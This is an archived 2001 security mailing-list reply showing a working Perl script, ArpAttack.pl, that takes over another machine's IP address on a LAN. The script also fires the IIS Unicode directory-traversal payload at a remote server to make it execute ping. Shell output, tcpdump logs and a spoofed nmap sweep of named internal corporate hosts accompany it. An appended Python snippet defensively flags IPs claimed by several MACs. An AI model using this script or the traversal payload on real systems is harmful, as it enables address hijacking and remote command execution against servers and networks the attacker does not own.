Vulnerability Development mailing list archives
Re: Hijack IP Address using cable modem
From: cdowns <cdowns () SKILLSOFT COM>
Date: Thu, 29 Mar 2001 09:33:43 -0500
playing around on my corporate LAN is gravy to accomplish this. Mediaone was a little more difficult but i wrote this little script to automate it ( this one works :))

here is my output:

setting up network spoof ....
ifconfig interface eth0:0 for spoof... .
----------------------------------------
eth0:0    Link encap:Ethernet  HWaddr 00:10:A4:C4:23:45
          inet addr:10.0.2.70  Bcast:10.0.3.255  Mask:255.255.254.0
          UP BROADCAST RUNNING  MTU:1500  Metric:1
          Interrupt:3 Base address:0x300

wait.. . using target to send icmp request.
-------------------------------------------
Reply from 10.0.2.70: bytes=32 time<10ms TTL=255
Reply from 10.0.2.70: bytes=32 time<10ms TTL=255
Reply from 10.0.2.70: bytes=32 time<10ms TTL=255
Reply from 10.0.2.70: bytes=32 time<10ms TTL=255

Ping statistics for 10.0.2.70:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

done
happy spoofing dud3z ~!
[root@scavenger /root]#

perl script.

#!/usr/bin/perl -w
# ArpAttack.pl by: Christopher M Downs 04-28-01
# ---------------------------------------------
# This program was inspired by a thread that started on vuln-dev () securityfocus com
# most cable networks have ARP Broadcasts enabled so arp spoofing works on that network
# this is a proof of concept program and is intended for educational purposes only therefore !
# i am not responsible for anything bad or just plain evil done with this program.
# enough said you know the rules.
# -D

system ("clear");

use LWP::Simple;
use Getopt::Std;

getopts("t:n:b:u:?", \%args);

if ( $args{t} ) { $target = $args{t}; } else { Usage(); }
if ( $args{"?"} ){ Usage(); }

# <---------------------------------------
## this is where we need to create a network alias on the local machine\
## for the network target we would like to spoof.
## we will cheat for now and use system calls just for the sake of getting something that works....

if ( $args{n} ) { $netmask = $args{n}; }
if ( $args{b} ) { $broadcast = $args{b}; }

print "setting up network spoof .... \n";
sleep 2;

# system call here.
system("/sbin/ifconfig eth0:0 $target netmask $netmask broadcast $broadcast");
print ("ifconfig interface eth0:0 for spoof... .\n");
print ("----------------------------------------\n");
system("/sbin/ifconfig eth0:0");

# use uni-code server for icmp to spoofed host.
# <---------------------------------------
if ( $args{u} ) {
$host_slut = $args{u};
$uni_target = get("http://$host_slut/scripts/..%c0%af../winnt/system32/ping.exe?+$target");
print "wait.. . using target to send icmp request.\n";
print "-------------------------------------------\n";
print ("$uni_target\n");
}

print "done\n";
print "happy spoofing dud3z ~!\n";

# <---------------------------------------
sub Usage {
print <<USAGE;
Usage: perl ArpAttack.pl -t <target> -n -b -u <uni-code server>
 -? this menu
 -t <target to spoof>
 -n netmask
 -b broadcast
 -u uni-code server to use
Sample: perl ArpAttack.pl -t 192.168.x.x -n 255.255.255.0 -b 192.168.0.255 -u 192.168.20.x
Note: this program needs to be run as root
USAGE
exit;
}

nslookup of target's dns:

[root@scavenger /root]# nslookup scriptor.corp.skillsoft.com
Server:  dns.corp.skillsoft.com
Address:  10.0.2.78

Name:    scriptor.corp.skillsoft.com
Address:  10.0.2.70

[root@scavenger /root]#

reply from tcpdump session while doing pingsweep of network::

[root@scavenger /root]# nmap -S 10.0.2.70 -sP 10.0.2.2-100

[root@scavenger /root]# tcpdump -i eth0:0 -p icmp
Kernel filter, protocol ALL, raw packet socket
tcpdump: listening on eth0:0
09:19:10.730838 scriptor.corp.skillsoft.com > dns.corp.skillsoft.com: icmp: echo request
09:19:10.731211 dns.corp.skillsoft.com > scriptor.corp.skillsoft.com: icmp: echo reply
09:19:10.733107 scriptor.corp.skillsoft.com > dns2.corp.skillsoft.com: icmp: echo request
09:19:10.733461 dns2.corp.skillsoft.com > scriptor.corp.skillsoft.com: icmp: echo reply
09:19:10.740784 scriptor.corp.skillsoft.com > acd.corp.skillsoft.com: icmp: echo request
09:19:10.741454 scriptor.corp.skillsoft.com > 10.0.2.98: icmp: echo request
09:19:10.742037 acd.corp.skillsoft.com > scriptor.corp.skillsoft.com: icmp: echo reply
09:19:10.742089 10.0.2.98 > scriptor.corp.skillsoft.com: icmp: echo reply

and obviously i get the replies on my end from nmap.

-D
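
A defensive counterpart to the post above, as an added example that is not part of the original message: it scans tcpdump ARP output for an IP address claimed by more than one MAC, which is what a second host aliasing an in-use address produces on the wire. The capture lines and the 02:00:00:aa:bb:* MACs are constructed; 10.0.2.70 and 00:10:A4:C4:23:45 are the values shown in the post's ifconfig output.

```python
import re
from collections import defaultdict

# Matches classic tcpdump ("arp reply 10.0.2.70 is-at 0:10:a4:c4:23:45")
# and modern tcpdump ("ARP, Reply 10.0.2.70 is-at 00:10:a4:c4:23:45, length 28").
ARP_REPLY = re.compile(
    r"arp,?\s+reply\s+(\d{1,3}(?:\.\d{1,3}){3})\s+is-at\s+"
    r"([0-9a-f]{1,2}(?::[0-9a-f]{1,2}){5})",
    re.IGNORECASE,
)


def normalize_mac(mac):
    """Lower-case and zero-pad each octet; old tcpdump prints 0:10:a4 for 00:10:a4."""
    return ":".join(octet.zfill(2) for octet in mac.lower().split(":"))


def find_ip_conflicts(lines):
    """Return {ip: sorted MAC list} for every IP claimed by more than one MAC."""
    claims = defaultdict(set)
    for line in lines:
        match = ARP_REPLY.search(line)
        if match:
            claims[match.group(1)].add(normalize_mac(match.group(2)))
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}


# Constructed sample capture (not from the original post). The owner of
# 10.0.2.70 answers with a made-up MAC, then a second host answers for the
# same address with the MAC from the post's ifconfig output.
SAMPLE = [
    "09:19:08.101200 arp who-has 10.0.2.70 tell 10.0.2.78",
    "09:19:08.101544 arp reply 10.0.2.70 is-at 2:0:0:aa:bb:1",
    "09:19:09.640010 arp reply 10.0.2.78 is-at 02:00:00:aa:bb:02",
    "09:19:10.730101 ARP, Reply 10.0.2.70 is-at 00:10:A4:C4:23:45, length 28",
    "09:19:11.001000 arp reply 10.0.2.70 is-at 02:00:00:AA:BB:01",
]

if __name__ == "__main__":
    for ip, macs in find_ip_conflicts(SAMPLE).items():
        print(f"ALERT {ip} claimed by {len(macs)} MACs: {', '.join(macs)}")
```

A hit is a lead rather than proof: NIC replacement and failover pairs also move an IP between MACs, so compare the flagged MACs against DHCP leases or switch port records before acting.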